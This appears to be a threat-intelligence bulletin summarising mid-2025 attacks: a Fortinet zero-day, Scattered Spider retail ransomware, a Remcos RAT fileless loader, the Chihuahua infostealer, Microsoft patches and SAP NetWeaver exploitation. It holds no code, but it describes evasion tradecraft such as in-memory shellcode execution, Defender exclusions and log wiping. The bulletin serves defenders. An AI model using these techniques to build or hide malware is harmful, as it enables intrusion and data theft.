Threat Alerts

Fortinet has released security updates addressing a critical vulnerability (CVE-2025-32756) that has been actively exploited as a zero-day in attacks targeting FortiVoice enterprise phone systems. The flaw, which carries a CVSS score of 9.6, is a stack-based buffer overflow (CWE-121) that could allow remote unauthenticated attackers to execute arbitrary code or commands via specially crafted HTTP requests.
According to Fortinet’s advisory, the vulnerability impacts multiple products including FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera. While the company confirmed active exploitation on FortiVoice systems, it did not disclose the scale or attribution of the attacks.
Attackers reportedly conducted network scans, enabled FCGI debugging to capture credentials, and erased system crash logs to cover their tracks. The vulnerability affects multiple Fortinet products, and users are urged to take necessary action.

Researchers have warned that hackers using Scattered Spider tactics, who recently attacked UK retail chains including Marks & Spencer, Co-op, and potentially Harrods, have now expanded their operations to target US retailers. The threat actors, also tracked as UNC3944, 0ktapus, Scatter Swine, Starfraud, and Muddled Libra, are employing ransomware and extortion operations against the retail sector, continuing their pattern of focusing on one industry at a time. These attackers are known for sophisticated social engineering techniques including phishing, SIM swapping, and MFA bombing, and have previously compromised high-profile organizations such as MGM Resorts, Twilio, Coinbase, and Reddit. The DragonForce ransomware operation, which emerged in December 2023 and has claimed responsibility for the UK retail attacks, appears to be the latest ransomware variant utilized by this fluid collective of threat actors who have previously affiliated with RansomHub, Qilin, and BlackCat ransomware operations.

A recent campaign demonstrates the continued evolution of fileless malware delivery, using a stealthy PowerShell-based shellcode loader to deploy Remcos RAT. The attack begins with ZIP archives containing malicious LNK files, which are disguised as Office documents and executed via mshta.exe. This method enables proxy execution of embedded VBScript code that downloads PowerShell payloads into the C:\Users\Public\ directory while evading Windows Defender through exclusion rules and stealthy registry modifications for persistence.

Once the PowerShell script is executed, it uses obfuscated Base64 strings to reconstruct two binary blobs: a lightweight shellcode loader and a full Remcos RAT payload. The loader allocates memory using VirtualAlloc, copies the shellcode into memory, and executes it with CallWindowProcW, enabling execution without writing anything to disk. The loader also dynamically resolves API calls by traversing the Process Environment Block (PEB), a common evasion tactic.

The final payload, Remcos RAT v6.0.0 Pro, operates fully in memory and connects to its command-and-control server over TLS on port 2025. It supports keylogging, clipboard access, screenshot capture, webcam/mic recording, UAC bypass, and process injection into svchost.exe via process hollowing. It also includes anti-analysis features like debugger detection and custom exception handlers. Remcos achieves persistence through registry entries and maintains control through a watchdog module to ensure continued operation even if interrupted.

Chihuahua Stealer is a newly identified .NET-based infostealer that demonstrates a more refined infection chain compared to typical commodity malware. It poses a risk to users through stealthy delivery mechanisms and persistent tactics, combining traditional infostealer objectives—such as harvesting browser credentials and cryptocurrency wallet data—with less common encryption and exfiltration methods. The malware is primarily spread through deceptive document links hosted on cloud storage platforms, where victims are lured into executing obfuscated PowerShell scripts. Its multi-stage architecture and in-memory execution strategies make it difficult to detect and analyze, increasing the potential impact on individuals and organizations exposed to this threat.

The infection begins with a malicious PowerShell script that initiates a staged execution process using encoded and obfuscated payloads. Persistence is achieved by registering scheduled tasks that continuously scan for infection markers and fetch follow-up payloads from multiple fallback domains. The main executable is eventually loaded into memory and run using .NET reflection, bypassing disk-based detection methods. Once active, the malware collects system identifiers and checks for the presence of specific browser directories and crypto wallet extensions. It extracts stored credentials, session data, and wallet files before compressing and encrypting them into a custom archive format.

After encryption, the stolen data is uploaded to a remote server over HTTPS, with the malware employing stealth techniques such as clearing clipboard contents and removing any temporary files or scheduled tasks. While the use of encryption is uncommon in most infostealers, the embedded key reduces its effectiveness as a defensive hurdle. Nevertheless, the use of memory-based loading, scheduled execution, and adaptive command-and-control mechanisms illustrate an effort to avoid detection and maintain operational flexibility. The campaign shows how relatively simple components, when chained effectively, can produce a capable and evasive information-stealing tool.

Microsoft’s May 2025 Patch Tuesday update delivers fixes for 72 vulnerabilities, including 5 actively exploited and 1 publicly disclosed zero-day. The publicly disclosed zero-day among them is CVE-2025-32702 (CVSS Score:7.8) , an improper neutralization of special elements used in a command (‘command injection’) in Visual Studio allows an unauthorized attacker to execute code locally.

Five actively exploited zero-day vulnerabilities have been addressed, including CVE-2025-30400 (CVSS 7.8), CVE-2025-32706 (CVSS 7.8), CVE-2025-32709 (CVSS 7.8), and CVE-2025-32701 (CVSS 7.8). These are privilege escalation vulnerabilities found in the Microsoft DWM Core Library, Windows Common Log File System Driver, and Windows Ancillary Function Drivers for Winsock, enabling authorized attackers to elevate privileges locally. Additionally, CVE-2025-30397 (CVSS 7.5), a Scripting Engine Memory Corruption vulnerability, allows unauthenticated attackers to achieve remote code execution by tricking a user into clicking a specially crafted link in Edge or Internet Explorer.

A number of critical vulnerabilities have been addressed, including Azure-related flaws such as CVE-2025-33072 (CVSS 8.1), CVE-2025-29972 (CVSS 9.9), CVE-2025-29813 (CVSS 10), CVE-2025-30387 (CVSS 9.8), and CVE-2025-29827 (CVSS 9.1). Additionally, critical remote code execution (RCE) vulnerabilities in Microsoft Office and Windows Remote Desktop—CVE-2025-30377 (CVSS 8.4), CVE-2025-30386 (CVSS 8.4), CVE-2025-29966 (CVSS 8.8), and CVE-2025-29967 (CVSS 8.8)—have also been resolved. Lastly, CVE-2025-47732 (CVSS 8.7) addresses a critical RCE vulnerability in Microsoft Dataverse. With the active exploitation of CVE-2025-32702 along with the critical severity of multiple high-risk vulnerabilities, organizations are strongly urged to prioritize patching efforts to mitigate the risk of exploitation and potential compromise.

The latest round of attacks targeting CVE-2025-31324 (CVSS 10.0) in SAP NetWeaver has been linked to the RansomEXX and BianLian ransomware groups. The campaign marks a shift from previously observed state-linked exploitation to financially motivated activity. Unpatched SAP systems are being compromised to deploy web shells, followed by the modular trojan PipeMagic and advanced post-exploitation tooling.

RansomEXX was previously seen deploying PipeMagic in an earlier campaign that leveraged CVE-2025-29824 (CVSS 7.8), a Windows CLFS zero-day used for SYSTEM-level privilege escalation. The reuse of this tool, combined with overlapping infrastructure and tradecraft, suggests a flexible and opportunistic approach to exploiting critical vulnerabilities across enterprise platforms. The shift toward SAP—an ERP backbone in many industries—demonstrates an escalation in both scope and potential impact.

In addition to CVE-2025-31324, attackers have also leveraged CVE-2025-42999 (CVSS 9.1), another vulnerability affecting the same SAP NetWeaver component. While exploitation details remain limited, the vulnerability is being used in tandem with CVE-2025-31324 in some cases—likely to support persistence or improve success rates across varied configurations. The coordinated use of both flaws suggests a deeper understanding of SAP internals and a continued effort to expand the attack surface within enterprise environments.